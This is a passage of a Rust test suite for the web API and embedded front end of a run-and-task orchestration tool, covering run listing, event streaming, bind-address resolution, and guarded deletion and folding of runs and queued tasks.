7880 assert_eq!(rows[0].live, crate::run::Liveness::Live);
7881 assert_eq!(rows[3].live, crate::run::Liveness::Live, "claim alone");
7882 assert_eq!(rows[0].superseded_by.as_deref(), Some("cccc"));
7883 assert_eq!(rows[1].superseded_by, None);
7884 }
7885
7886 #[test]
7887 fn run_list_exposes_a_confirmed_dead_driver_for_stale_presentation() {
7888 let mut state = RunState::new(
7889 PathBuf::from("/repo/magi"),
7890 "main".to_owned(),
7891 "0123456789abcdef".to_owned(),
7892 "Review only".to_owned(),
7893 Config::default(),
7894 );
7895 state.id = "20260922-090200-dead".to_owned();
7896 state.status = RunStatus::Reviewing;
7897 let row = serde_json::to_value(RunSummary::of(&state, false, crate::run::Liveness::Dead))
7898 .expect("serialize list row");
7899 assert_eq!(row["status"], "reviewing");
7900 assert_eq!(row["live"], "dead", "{row}");
7901 assert!(!row["done"].as_bool().unwrap());
7902 }
7903
7904 #[tokio::test]
7905 async fn the_run_list_is_newest_first_and_honours_a_limit() {
7906 let f = Fixture::start().await;
7907 for id in [
7908 "20260902-140501-aaaa",
7909 "20260902-140502-bbbb",
7910 "20260902-140503-cccc",
7911 ] {
7912 write_run(&f.runs(), id, RunStatus::Merged);
7913 }
7914
7915 let all = f.get("/api/runs").await.json();
7916 let capped = f.get("/api/runs?limit=2").await.json();
7917
7918 assert_eq!(all[0]["id"], "20260902-140503-cccc");
7919 assert_eq!(all.as_array().map(Vec::len), Some(3));
7920 assert_eq!(capped.as_array().map(Vec::len), Some(2));
7921 assert_eq!(capped[0]["id"], "20260902-140503-cccc");
7922 }
7923
7924 #[tokio::test]
7925 async fn the_report_route_serves_the_terminal_report_as_plain_text() {
7926 let f = Fixture::start().await;
7927 write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Blocked);
7928
7929 let res = f.get("/api/runs/20260902-140501-a1b2/report").await;
7930
7931 assert_eq!(res.status, 200);
7932 assert!(
7933 res.headers
7934 .contains("content-type: text/plain; charset=utf-8"),
7935 "a browser must render it, not download it: {}",
7936 res.headers
7937 );
7938 assert!(
7942 res.body.contains("20260902-140501-a1b2"),
7943 "the report is about the run that was asked for: {}",
7944 res.body
7945 );
7946 }
7947
7948 #[tokio::test]
7949 async fn the_front_end_is_served_from_the_binary_with_types_a_phone_renders() {
7950 let f = Fixture::start().await;
7951
7952 let html = f.get("/").await;
7953 let css = f.get("/app.css").await;
7954 let js = f.get("/app.js").await;
7955
7956 assert_eq!((html.status, css.status, js.status), (200, 200, 200));
7957 assert!(
7958 html.headers
7959 .contains("content-type: text/html; charset=utf-8")
7960 );
7961 assert!(css.headers.contains("content-type: text/css"));
7962 assert!(js.headers.contains("content-type: text/javascript"));
7963 assert_eq!(html.body, INDEX_HTML, "compiled in, never read from disk");
7964 }
7965
7966 #[test]
7967 fn review_rounds_label_a_distinct_verified_head() {
7968 assert!(APP_JS.contains("round.verified_head"));
7969 assert!(APP_JS.contains("verified HEAD"));
7970 assert!(APP_JS.contains("verified ${String(round.verified_head).slice(0, 7)}"));
7971 }
7972
7973 #[test]
7974 fn queue_ui_presents_blocked_dependencies_and_resolved_questions() {
7975 assert!(APP_JS.contains("blocked: { glyph:"));
7979 assert!(APP_JS.contains("Blocked. Waiting on another task or question to resolve."));
7980
7981 assert!(APP_JS.contains("function classifyBlockedBy(blockedBy, tasksById, questionsById)"));
7985 assert!(
7986 APP_JS.contains(
7987 "if (parts.length) noteText = `${noteText} Waiting on ${parts.join(\" and \")}.`;"
7988 ),
7989 "the note line must name what a blocked task is waiting on, not just that it is blocked"
7990 );
7991 assert!(APP_JS.contains("if (status === \"blocked\") {"));
7995
7996 assert!(APP_JS.contains("function depNode(id, byId, questionNodes)"));
8000 assert!(APP_JS.contains("questionNodes.set(dep, questionsById.get(dep));"));
8001 assert!(
8002 APP_JS.contains("location.hash = \"#/questions\";"),
8003 "a question node must jump to the Questions screen, not pretend to be a task"
8004 );
8005
8006 assert!(APP_JS.contains("Resolved questions"));
8009 assert!(APP_JS.contains("r.answersList.append("));
8010 assert!(APP_CSS.contains(".task-answers"));
8011 }
8012
8013 #[test]
8014 fn a_task_notification_links_to_its_own_card_not_the_bare_backlog() {
8015 assert!(
8020 APP_JS.contains(
8021 "el(\"a\", { href: `#/queue/${encodeURIComponent(link.id)}`, text: `Task ${shortId(link.id)}` })"
8022 ),
8023 "a task notice's link must carry the task id into the hash, not just name the Backlog screen"
8024 );
8025 assert!(
8026 !APP_JS.contains("el(\"a\", { href: \"#/queue\", text: `Task ${shortId(link.id)}` })"),
8027 "regression: the task link must not go back to naming the bare Backlog route"
8028 );
8029
8030 assert!(
8033 APP_JS.contains(
8034 "if (parts[0] === \"queue\" && parts[1]) return { name: \"queue\", id: decodeURIComponent(parts[1]) };"
8035 ),
8036 "`#/queue/<id>` must parse into a route carrying that id"
8037 );
8038
8039 assert!(APP_JS.contains("state.queueFocus = route.id;"));
8043 assert!(APP_JS.contains("function consumeQueueFocus()"));
8044 assert!(APP_JS.contains("jumpToTask(id);"));
8045 }
8046
8047 #[test]
8048 fn consuming_a_queue_focus_survives_clearing_a_stale_backlog_search() {
8049 assert!(
8058 APP_JS.contains(
8059 " if (!id || state.queue === null) return;\n if (state.queueSearch.trim() !== \"\") {"
8060 ),
8061 "the search-clearing branch must run before state.queueFocus is cleared, or the \
8062 recursive renderQueue() call has nothing left to jump to"
8063 );
8064 assert!(
8065 APP_JS.contains("state.queueFocus = null;\n jumpToTask(id);"),
8066 "state.queueFocus must be cleared immediately before the jump it guards, not earlier"
8067 );
8068 }
8069
8070 #[test]
8071 fn a_notification_card_navigates_from_anywhere_on_it_not_just_its_link_text() {
8072 assert!(
8080 APP_JS.contains(
8081 "onclick: link ? (event) => { if (!event.target.closest(\"a, button\")) link.click(); } : null"
8082 ),
8083 "the notice card itself must forward a tap outside its link/buttons to the link's own click"
8084 );
8085 }
8086
8087 #[test]
8088 fn review_rounds_tell_a_stale_verification_and_a_resource_block_apart_from_a_real_result() {
8089 assert!(
8090 APP_JS.contains("round.verified_head !== round.head"),
8091 "a round that verified an earlier commit must be visibly distinct from one that \
8092 verified the head reviewers are looking at now"
8093 );
8094 assert!(
8095 APP_JS.contains("round.verified_at"),
8096 "when a check ran must be on the wire, not just which commit"
8097 );
8098 assert!(
8099 APP_JS.contains("resource_blocked"),
8100 "a command magi never got to run (shared build cache contention) must not render \
8101 the same as a command that ran and failed"
8102 );
8103 }
8104
8105 #[tokio::test]
8106 async fn the_change_stream_announces_the_current_revisions_on_connect() {
8107 let f = Fixture::start().await;
8108
8109 let mut socket = tokio::net::TcpStream::connect(f.addr)
8110 .await
8111 .expect("connect");
8112 socket
8113 .write_all(
8114 b"GET /api/events HTTP/1.1\r\nHost: magi\r\nAccept: text/event-stream\r\n\r\n",
8115 )
8116 .await
8117 .expect("write request");
8118
8119 let mut seen = String::new();
8122 let mut buf = [0u8; 1024];
8123 while !seen.contains("event: change") {
8124 let read = tokio::time::timeout(Duration::from_secs(5), socket.read(&mut buf))
8125 .await
8126 .expect("the stream must speak within five seconds")
8127 .expect("read");
8128 assert!(read > 0, "the server closed the change stream: {seen}");
8129 seen.push_str(&String::from_utf8_lossy(&buf[..read]));
8130 }
8131
8132 assert!(
8133 seen.to_lowercase()
8134 .contains("content-type: text/event-stream"),
8135 "the browser only reconnects automatically for a real SSE stream: {seen}"
8136 );
8137 let data = seen
8138 .lines()
8139 .find_map(|l| l.strip_prefix("data:"))
8140 .expect("a data line");
8141 let payload: Value = serde_json::from_str(data.trim()).expect("json payload");
8142 assert!(
8143 payload["queue_rev"].is_u64()
8144 && payload["runs_rev"].is_u64()
8145 && payload["questions_rev"].is_u64()
8146 && payload["talks_rev"].is_u64()
8147 && payload["notifications_rev"].is_u64()
8148 && payload["loop_rev"].is_u64(),
8149 "the client needs one revision per store to know what to refetch, \
8150 and `talks_rev` is the only notification a standing talk gets - a \
8151 phone whose radio slept through a turn learns about it here, as \
8152 does one whose operator started the loop from another device: \
8153 {payload}"
8154 );
8155
8156 let health = f.get("/api/health").await.json();
8163 for key in [
8164 "queue_rev",
8165 "runs_rev",
8166 "questions_rev",
8167 "talks_rev",
8168 "notifications_rev",
8169 "loop_rev",
8170 ] {
8171 assert!(
8172 health[key].is_u64(),
8173 "health is the change stream's fallback and is missing `{key}`: {health}"
8174 );
8175 }
8176 }
8177
8178 #[tokio::test]
8179 async fn a_new_turn_on_a_talk_moves_the_change_stream_revision() {
8180 let f = Fixture::start().await;
8181 let before = f.get("/api/health").await.json()["talks_rev"]
8182 .as_u64()
8183 .expect("talks_rev");
8184
8185 let talk = seed_talk(&f, "20260904-014455-ab12", "open");
8186 std::thread::sleep(Duration::from_millis(10));
8187 let mut on_disk = f.talks().get(&talk).expect("get seeded talk");
8188 on_disk.turns.push(crate::talk::Turn {
8189 who: crate::talk::Who::Operator,
8190 body: "a new turn".to_owned(),
8191 at: Timestamp::now(),
8192 attachments: Vec::new(),
8193 });
8194 f.talks().put(&mut on_disk).expect("record a turn");
8195
8196 let after = f.get("/api/health").await.json()["talks_rev"]
8197 .as_u64()
8198 .expect("talks_rev");
8199 assert_ne!(
8200 before, after,
8201 "a phone must be able to notice a talk's reply without polling every store"
8202 );
8203 }
8204
8205 #[test]
8206 fn bind_reads_back_from_the_spelling_the_cli_prints() {
8207 for bind in [Bind::Auto, Bind::Addr(IpAddr::V4(Ipv4Addr::LOCALHOST))] {
8211 assert_eq!(bind.to_string().parse::<Bind>(), Ok(bind));
8212 }
8213 assert_eq!("AUTO".parse::<Bind>(), Ok(Bind::Auto));
8214 assert!("everywhere".parse::<Bind>().is_err());
8215 }
8216
8217 #[test]
8218 fn an_explicit_bind_address_is_taken_verbatim() {
8219 let asked = IpAddr::V4(Ipv4Addr::new(192, 168, 1, 20));
8220
8221 let (addr, warning) = resolve_bind(&Bind::Addr(asked));
8222
8223 assert_eq!(addr, asked);
8224 assert!(
8225 warning.is_none(),
8226 "an operator who named an address gets no lecture"
8227 );
8228 }
8229
8230 #[test]
8231 fn bind_auto_either_finds_a_tailnet_address_or_says_the_ui_is_local_only() {
8232 let (addr, warning) = resolve_bind(&Bind::Auto);
8233
8234 match addr {
8241 IpAddr::V4(ip) if is_tailnet(&ip) => {
8242 assert!(warning.is_none(), "a tailnet address needs no warning");
8243 }
8244 other => {
8245 assert_eq!(other, IpAddr::V4(Ipv4Addr::LOCALHOST));
8246 let warning = warning.expect("a fallback has to explain itself");
8247 assert!(
8248 warning.contains("127.0.0.1") && warning.contains("local-only"),
8249 "the warning says what happened and what it costs: {warning}"
8250 );
8251 }
8252 }
8253 }
8254
8255 #[test]
8256 fn only_the_cgnat_block_counts_as_a_tailnet_address() {
8257 assert!(is_tailnet(&Ipv4Addr::new(100, 64, 0, 1)));
8261 assert!(is_tailnet(&Ipv4Addr::new(100, 127, 255, 254)));
8262 assert!(!is_tailnet(&Ipv4Addr::new(100, 63, 255, 255)));
8263 assert!(!is_tailnet(&Ipv4Addr::new(100, 128, 0, 1)));
8264 assert!(!is_tailnet(&Ipv4Addr::new(127, 0, 0, 1)));
8265 }
8266
8267 #[test]
8268 fn an_ambiguous_prefix_is_a_bad_request_and_a_missing_one_is_not_found() {
8269 let ids = vec![
8270 "20260902-140501-aaaa".to_owned(),
8271 "20260902-140502-aabb".to_owned(),
8272 ];
8273
8274 let missing = pick(ids.clone(), "zzzz", "run").expect_err("no match");
8275 let ambiguous = pick(ids.clone(), "202609", "run").expect_err("two matches");
8276 let short = pick(ids, "aabb", "run").expect("the short id is the tail of an id");
8277
8278 assert_eq!(missing.status, StatusCode::NOT_FOUND);
8279 assert_eq!(ambiguous.status, StatusCode::BAD_REQUEST);
8280 assert_eq!(short, "20260902-140502-aabb");
8281 }
8282 #[tokio::test]
8283 async fn a_panel_reaches_its_assets_by_the_bare_name_it_was_told_to_use() {
8284 let fx = Fixture::start().await;
8290 let id = panel(
8291 &fx,
8292 "<img src=\"shot.png\">",
8293 &[("shot.png", b"\x89PNG\r\n\x1a\n")],
8294 );
8295
8296 let doc = fx
8298 .get(&format!("/api/questions/{id}/panel/index.html"))
8299 .await;
8300 assert_eq!(doc.status, 200, "{}", doc.body);
8301 assert_eq!(doc.header("content-type"), Some("text/html; charset=utf-8"));
8302
8303 let sibling = fx.get(&format!("/api/questions/{id}/panel/shot.png")).await;
8304 assert_eq!(sibling.status, 200, "{}", sibling.body);
8305 assert_eq!(sibling.header("content-type"), Some("image/png"));
8306 assert_eq!(
8307 sibling.header("content-security-policy"),
8308 Some(PANEL_CSP),
8309 "the sibling route must carry the same policy as the asset route"
8310 );
8311
8312 assert_eq!(
8315 fx.head(&format!("/api/questions/{id}/panel")).await.status,
8316 200
8317 );
8318 }
8319
8320 #[test]
8321 fn runs_revision_moves_when_deleting_an_older_run() {
8322 let temp = TempDir::new().expect("tempdir");
8323 let runs = temp.path().join("runs");
8324 std::fs::create_dir_all(&runs).expect("create runs dir");
8325
8326 assert_eq!(runs_revision(&runs), 0, "empty runs has 0 revision");
8327
8328 write_run(&runs, "20260901-100000-old1", RunStatus::Merged);
8329 std::thread::sleep(Duration::from_millis(10));
8330 write_run(&runs, "20260902-100000-new2", RunStatus::Merged);
8331
8332 let rev_before = runs_revision(&runs);
8333 assert!(rev_before > 0);
8334
8335 let old_dir = runs.join("20260901-100000-old1");
8336 std::fs::remove_dir_all(&old_dir).expect("remove old run");
8337
8338 let rev_after = runs_revision(&runs);
8339 assert_ne!(
8340 rev_before, rev_after,
8341 "deleting an older run must change the revision so other clients see the deletion"
8342 );
8343 }
8344
8345 fn write_state(runs: &FsPath, state: &RunState) {
8350 let dir = runs.join(&state.id);
8351 std::fs::create_dir_all(&dir).expect("run dir");
8352 std::fs::write(
8353 dir.join("run.json"),
8354 serde_json::to_string_pretty(state).expect("serialize run"),
8355 )
8356 .expect("write run.json");
8357 }
8358
8359 #[test]
8364 fn runs_revision_moves_when_a_seat_starts_and_again_when_it_finishes() {
8365 let temp = TempDir::new().expect("tempdir");
8366 let runs = temp.path().join("runs");
8367 std::fs::create_dir_all(&runs).expect("create runs dir");
8368 let mut state = RunState::new(
8369 PathBuf::from("/repo/magi"),
8370 "main".to_owned(),
8371 "0123456789abcdef".to_owned(),
8372 "task".to_owned(),
8373 Config::default(),
8374 );
8375 state.id = "20260902-100000-c0de".to_owned();
8376 write_state(&runs, &state);
8377
8378 let rev_idle = runs_revision(&runs);
8379 std::thread::sleep(Duration::from_millis(10));
8380 state.seat_started("judge", "judge-1", std::time::Duration::from_secs(60), 0);
8381 write_state(&runs, &state);
8382 let rev_started = runs_revision(&runs);
8383 assert_ne!(
8384 rev_idle, rev_started,
8385 "a seat starting must move the revision"
8386 );
8387
8388 std::thread::sleep(Duration::from_millis(10));
8389 state.seat_finished("judge-1");
8390 write_state(&runs, &state);
8391 let rev_finished = runs_revision(&runs);
8392 assert_ne!(
8393 rev_started, rev_finished,
8394 "and clearing it again must move the revision a second time"
8395 );
8396 }
8397
8398 #[tokio::test]
8399 async fn queue_json_carries_dependency_fields_and_a_hold_clears_them() {
8400 let fx = Fixture::start().await;
8405 let q = fx.queue();
8406
8407 let mut t = Task::new(
8408 "Task".to_owned(),
8409 "Instruction".to_owned(),
8410 PathBuf::from("/repo"),
8411 Source::Human,
8412 );
8413 t.block(
8414 vec!["20260101-000000-dead".to_owned()],
8415 Some("waiting on Task 1".to_owned()),
8416 );
8417 t.answers.push(crate::queue::AnsweredQuestion {
8418 question: "Which backend?".to_owned(),
8419 answer: "SQLite".to_owned(),
8420 });
8421 q.put(&mut t).expect("put t");
8422
8423 let res = fx.get("/api/queue").await;
8424 assert_eq!(res.status, 200);
8425 let list = res.json();
8426 let view = list
8427 .as_array()
8428 .expect("array")
8429 .iter()
8430 .find(|v| v["id"] == t.id)
8431 .expect("task in list");
8432 assert_eq!(view["status_str"], "blocked");
8433 assert_eq!(
8434 view["blocked_by"],
8435 serde_json::json!(["20260101-000000-dead"])
8436 );
8437 assert_eq!(view["block_reason"], "waiting on Task 1");
8438 assert_eq!(view["answers"][0]["question"], "Which backend?");
8439 assert_eq!(view["answers"][0]["answer"], "SQLite");
8440
8441 let res = fx
8445 .post(&format!("/api/queue/{}/hold", t.short()), None)
8446 .await;
8447 assert_eq!(res.status, 200);
8448 let held = res.json();
8449 assert_eq!(held["status_str"], "held");
8450 assert_eq!(held["blocked_by"], serde_json::json!([]));
8451 assert!(held["block_reason"].is_null());
8452 assert_eq!(held["answers"][0]["answer"], "SQLite");
8453 }
8454
8455 #[tokio::test]
8456 async fn queue_json_shows_a_blocked_chain_and_its_stuck_root() {
8457 let fx = Fixture::start().await;
8458 let q = fx.queue();
8459 let mk = |title: &str| {
8460 Task::new(
8461 title.to_owned(),
8462 "Instruction".to_owned(),
8463 PathBuf::from("/repo"),
8464 Source::Human,
8465 )
8466 };
8467 let mut root = mk("root");
8468 root.hold_manual(Some("waiting".to_owned()));
8469 q.put(&mut root).unwrap();
8470 let mut mid = mk("mid");
8471 mid.block(vec![root.id.clone()], None);
8472 q.put(&mut mid).unwrap();
8473 let mut leaf = mk("leaf");
8474 leaf.block(vec![mid.id.clone()], None);
8475 q.put(&mut leaf).unwrap();
8476
8477 let list = fx.get("/api/queue").await.json();
8478 let find = |id: &str| {
8479 list.as_array()
8480 .unwrap()
8481 .iter()
8482 .find(|v| v["id"] == id)
8483 .unwrap()
8484 .clone()
8485 };
8486 let leaf_view = find(&leaf.id);
8487 assert_eq!(
8488 leaf_view["waits_on"],
8489 serde_json::json!([format!("{} (blocked → {} held)", mid.short(), root.short())])
8490 );
8491 assert_eq!(leaf_view["stuck_roots"], serde_json::json!([root.short()]));
8492 assert_eq!(
8493 find(&mid.id)["waits_on"],
8494 serde_json::json!([format!("{} (held)", root.short())])
8495 );
8496 assert_eq!(find(&root.id)["waits_on"], serde_json::json!([]));
8497 }
8498
8499 #[tokio::test]
8500 async fn delete_queue_task_deletes_file_and_guards_running_and_locked() {
8501 let fx = Fixture::start().await;
8502 let q = fx.queue();
8503
8504 let mut t1 = Task::new(
8506 "Task 1".to_owned(),
8507 "Instruction 1".to_owned(),
8508 PathBuf::from("/repo"),
8509 Source::Human,
8510 );
8511 let run_id = "20260901-000000-r111";
8512 t1.runs.push(run_id.to_owned());
8513 write_run(&fx.runs(), run_id, RunStatus::Merged);
8514 q.put(&mut t1).expect("put t1");
8515
8516 let res = fx.delete(&format!("/api/queue/{}", t1.short())).await;
8518 assert_eq!(res.status, 204);
8519 assert!(res.body.is_empty(), "204 No Content has no body");
8520 assert!(!q.path_of(&t1.id).exists(), "task file is deleted");
8521 assert!(
8522 fx.runs().join(run_id).exists(),
8523 "run directory must not be deleted when its task is deleted"
8524 );
8525
8526 let mut t2 = Task::new(
8528 "Task 2".to_owned(),
8529 "Instruction 2".to_owned(),
8530 PathBuf::from("/repo"),
8531 Source::Human,
8532 );
8533 t2.status = TaskStatus::Running;
8534 q.put(&mut t2).expect("put t2");
8535 let mut beat = crate::daemon::Status::new();
8536 beat.current = vec![crate::daemon::Current {
8537 task: t2.id.clone(),
8538 run: "20260901-000000-r222".to_owned(),
8539 }];
8540 beat.updated_at = jiff::Timestamp::now();
8541 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8542 .expect("publish a heartbeat");
8543 let res = fx.delete(&format!("/api/queue/{}", t2.id)).await;
8544 assert_eq!(res.status, 409);
8545 assert!(
8546 res.json()["error"]
8547 .as_str()
8548 .unwrap()
8549 .contains("live daemon")
8550 );
8551 assert!(q.path_of(&t2.id).exists(), "a task in flight is kept");
8552
8553 beat.updated_at = jiff::Timestamp::now() - jiff::SignedDuration::from_secs(600);
8559 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8560 .expect("leave a stale heartbeat");
8561 let mut t3 = Task::new(
8562 "Task 3".to_owned(),
8563 "Instruction 3".to_owned(),
8564 PathBuf::from("/repo"),
8565 Source::Human,
8566 );
8567 t3.status = TaskStatus::Running;
8568 q.put(&mut t3).expect("put t3");
8569 std::mem::forget(q.claim(&t3.id).expect("claim t3"));
8570 let res = fx.delete(&format!("/api/queue/{}", t3.id)).await;
8571 assert_eq!(res.status, 204);
8572 assert!(!q.path_of(&t3.id).exists(), "the task file is gone");
8573 assert!(
8574 q.claim(&t3.id).is_ok(),
8575 "the stale lock went with it, so the id is claimable again"
8576 );
8577
8578 let res = fx.delete("/api/queue/nonexistent").await;
8580 assert_eq!(res.status, 404);
8581 }
8582
8583 #[tokio::test]
8584 async fn delete_run_deletes_directory_and_guards_running_and_unfolded() {
8585 let fx = Fixture::start().await;
8586 let runs = fx.runs();
8587
8588 let run_id = "20260901-000000-fold";
8590 let mut state = RunState::new(
8591 PathBuf::from("/repo"),
8592 "main".to_owned(),
8593 "abc".to_owned(),
8594 "instruction".to_owned(),
8595 Config::default(),
8596 );
8597 state.id = run_id.to_owned();
8598 state.status = RunStatus::Merged;
8599 state.candidates.push(crate::run::Candidate {
8600 index: 0,
8601 label: 'A',
8602 agent: "a".to_owned(),
8603 branch: "b".to_owned(),
8604 worktree: PathBuf::from("/w"),
8605 summary: String::new(),
8606 stat: String::new(),
8607 files: 1,
8608 commits: 1,
8609 empty: false,
8610 failed: None,
8611 verified_noop: None,
8612 duration_ms: 0,
8613 folded: true,
8614 });
8615 let dir = runs.join(run_id);
8616 std::fs::create_dir_all(dir.join("artifacts")).expect("create artifacts");
8617 std::fs::write(dir.join("artifacts").join("patch.diff"), "dummy diff")
8618 .expect("write artifact");
8619 std::fs::write(dir.join("run.json"), serde_json::to_string(&state).unwrap())
8620 .expect("write run.json");
8621
8622 let res = fx.delete(&format!("/api/runs/{}", state.short())).await;
8624 assert_eq!(res.status, 204);
8625 assert!(res.body.is_empty(), "204 has no body");
8626 assert!(!dir.exists(), "run directory and artifacts must be deleted");
8627
8628 let run_running = "20260901-000000-rung";
8633 write_run(&runs, run_running, RunStatus::Prep);
8634 let mut beat = crate::daemon::Status::new();
8635 beat.current = vec![crate::daemon::Current {
8636 task: "20260901-000000-task".to_owned(),
8637 run: run_running.to_owned(),
8638 }];
8639 beat.updated_at = jiff::Timestamp::now();
8640 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8641 .expect("publish a heartbeat");
8642 let res = fx.delete(&format!("/api/runs/{run_running}")).await;
8643 assert_eq!(res.status, 409);
8644 assert!(
8645 res.json()["error"]
8646 .as_str()
8647 .unwrap()
8648 .contains("live daemon"),
8649 "the refusal must say who is holding it"
8650 );
8651 assert!(
8652 runs.join(run_running).exists(),
8653 "a run in flight keeps its directory"
8654 );
8655
8656 let run_unfolded = "20260901-000000-unfd";
8658 let mut state2 = RunState::new(
8659 PathBuf::from("/repo"),
8660 "main".to_owned(),
8661 "abc".to_owned(),
8662 "instruction".to_owned(),
8663 Config::default(),
8664 );
8665 state2.id = run_unfolded.to_owned();
8666 state2.status = RunStatus::Ready;
8667 state2.candidates.push(crate::run::Candidate {
8668 index: 0,
8669 label: 'A',
8670 agent: "a".to_owned(),
8671 branch: "b".to_owned(),
8672 worktree: PathBuf::from("/w"),
8673 summary: String::new(),
8674 stat: String::new(),
8675 files: 1,
8676 commits: 1,
8677 empty: false,
8678 failed: None,
8679 verified_noop: None,
8680 duration_ms: 0,
8681 folded: false,
8682 });
8683 let dir2 = runs.join(run_unfolded);
8684 std::fs::create_dir_all(&dir2).expect("create dir2");
8685 std::fs::write(
8686 dir2.join("run.json"),
8687 serde_json::to_string(&state2).unwrap(),
8688 )
8689 .expect("write run.json");
8690
8691 let res = fx.delete(&format!("/api/runs/{run_unfolded}")).await;
8692 assert_eq!(res.status, 409);
8693 assert!(res.json()["error"].as_str().unwrap().contains("magi fold"));
8694 assert!(dir2.exists(), "unfolded run directory is kept");
8695
8696 let res = fx.delete("/api/runs/nonexistent").await;
8698 assert_eq!(res.status, 404);
8699 }
8700
8701 #[test]
8710 fn stats_queue_tiles_render_even_when_there_are_no_runs() {
8711 let start = APP_JS
8712 .find("function renderStats() {")
8713 .expect("renderStats");
8714 let end = start
8715 + APP_JS[start..]
8716 .find("function statsTile(")
8717 .expect("the next top-level function");
8718 let body = &APP_JS[start..end];
8719
8720 let gate_start = body.find("if (!noRuns) {").expect("the noRuns gate");
8721 let gate_end = gate_start
8722 + body[gate_start..]
8723 .find("}\n renderStatsQueue")
8724 .expect("the gate's own closing brace, right before the unconditional call");
8725 let gated = &body[gate_start..gate_end];
8726
8727 assert_eq!(
8728 body.matches("renderStatsQueue(").count(),
8729 1,
8730 "renderStats must call renderStatsQueue exactly once: {body}"
8731 );
8732 assert!(
8733 !gated.contains("renderStatsQueue"),
8734 "renderStatsQueue must not be inside the `if (!noRuns)` block that hides the \
8735 run-derived panels on an empty run history - the queue panel has to render \
8736 regardless: {gated}"
8737 );
8738 }
8739
8740 #[test]
8741 fn web_ui_delete_contract_in_front_end() {
8742 assert!(APP_JS.contains("deleteRun:"));
8744 assert!(APP_JS.contains("deleteTask:"));
8745
8746 let run_cards_slice = &APP_JS[APP_JS.find("function createRunCard").unwrap()
8748 ..APP_JS.find("function renderRuns").unwrap()];
8749 assert!(!run_cards_slice.to_lowercase().contains("delete"));
8750
8751 assert!(APP_JS.contains("renderRunDelete"));
8753 assert!(APP_JS.contains("runDeleteReason"));
8754 assert!(APP_JS.contains("magi fold"));
8755 assert!(APP_JS.contains("This run is still in flight and cannot be deleted."));
8756
8757 assert!(APP_JS.contains("cancel.focus"));
8759 assert!(APP_JS.contains("armedRunDelete"));
8760 assert!(APP_JS.contains("armedDelete"));
8761
8762 assert!(APP_JS.contains("disabled: status === \"running\""));
8764 }
8765
8766 #[test]
8786 fn every_ref_a_run_card_uses_is_one_its_builder_published() {
8787 let build = APP_JS
8788 .find("function createRunCard")
8789 .expect("createRunCard exists");
8790 let update = APP_JS
8791 .find("function updateRunCard")
8792 .expect("updateRunCard exists");
8793 let end = APP_JS
8794 .find("function renderRuns")
8795 .expect("renderRuns exists");
8796
8797 let builder = &APP_JS[build..update];
8799 let open = builder.find("refs = {").expect("createRunCard sets refs");
8800 let literal = &builder[open + "refs = {".len()..];
8801 let close = literal.find('}').expect("the refs literal is closed");
8802 let published: HashSet<&str> = literal[..close]
8803 .split(',')
8804 .filter_map(|entry| entry.split(':').next())
8806 .map(str::trim)
8807 .filter(|name| !name.is_empty())
8808 .collect();
8809 assert!(
8810 published.len() > 5,
8811 "the refs literal did not parse into names: {published:?}"
8812 );
8813
8814 let mut used: Vec<&str> = Vec::new();
8817 let updaters = &APP_JS[update..end];
8818 for (at, _) in updaters.match_indices("r.") {
8819 let before = updaters[..at].chars().next_back();
8822 if before.is_some_and(|c| c.is_alphanumeric() || c == '_' || c == '$' || c == '.') {
8823 continue;
8824 }
8825 let rest = &updaters[at + 2..];
8826 let len = rest
8827 .find(|c: char| !(c.is_alphanumeric() || c == '_' || c == '$'))
8828 .unwrap_or(rest.len());
8829 if len > 0 {
8830 used.push(&rest[..len]);
8831 }
8832 }
8833 assert!(
8834 used.len() > 5,
8835 "no `r.<name>` uses were found; the updaters must have been rewritten: {used:?}"
8836 );
8837
8838 let missing: Vec<&str> = used
8839 .iter()
8840 .copied()
8841 .filter(|name| !published.contains(name))
8842 .collect();
8843 assert!(
8844 missing.is_empty(),
8845 "a run card's updater reaches for {missing:?}, which `createRunCard` \
8846 never put in `refs` - every card will throw and the list will \
8847 render empty under a count line that says otherwise. Published: \
8848 {published:?}"
8849 );
8850 }
8851
8852 #[tokio::test]
8853 async fn folding_from_the_phone_reports_what_it_removed() {
8854 let fx = Fixture::start().await;
8855 let runs = fx.runs();
8856
8857 let id = "20260901-000000-fold";
8861 write_run(&runs, id, RunStatus::Stalled);
8862 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8863 assert_eq!(res.status, 200);
8864 assert_eq!(res.json()["removed_count"], 0);
8865 assert_eq!(res.json()["run"], id);
8866 assert!(
8867 runs.join(id).exists(),
8868 "a fold keeps the run's record; only the worktrees go"
8869 );
8870 }
8871
8872 #[tokio::test]
8873 async fn folding_an_unreadable_run_falls_back_to_removing_it_wholesale() {
8874 let fx = Fixture::start().await;
8875 let runs = fx.runs();
8876 let wt = fx.home.path().join("wt").join("magi").join("dead");
8877 let id = "20260901-000000-dead";
8878 std::fs::create_dir_all(runs.join(id)).expect("run dir");
8879 std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
8880 std::fs::create_dir_all(&wt).expect("worktree dir");
8881
8882 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8883 assert_eq!(res.status, 200, "{}", res.body);
8884 assert!(
8885 res.json()["removed_count"].as_u64().unwrap() > 0,
8886 "the worktree this build could not read a state for still went"
8887 );
8888 assert!(
8889 !runs.join(id).exists(),
8890 "an unreadable run has no candidate list to fold selectively, so \
8891 the whole record goes - same as `magi fold` on the CLI"
8892 );
8893 }
8894
8895 #[tokio::test]
8896 async fn deleting_an_unreadable_run_removes_it_wholesale() {
8897 let fx = Fixture::start().await;
8898 let runs = fx.runs();
8899 let wt = fx.home.path().join("wt").join("magi").join("gone");
8900 let id = "20260901-000000-gone";
8901 std::fs::create_dir_all(runs.join(id)).expect("run dir");
8902 std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
8903 std::fs::create_dir_all(&wt).expect("worktree dir");
8904
8905 let res = fx.delete(&format!("/api/runs/{id}")).await;
8906 assert_eq!(res.status, 204, "{}", res.body);
8907 assert!(!runs.join(id).exists(), "the broken record is gone");
8908 assert!(!wt.exists(), "its worktree is gone too");
8909 }
8910
8911 #[tokio::test]
8912 async fn folding_is_refused_while_a_daemon_is_working_on_the_run() {
8913 let fx = Fixture::start().await;
8914 let runs = fx.runs();
8915 let id = "20260901-000000-live";
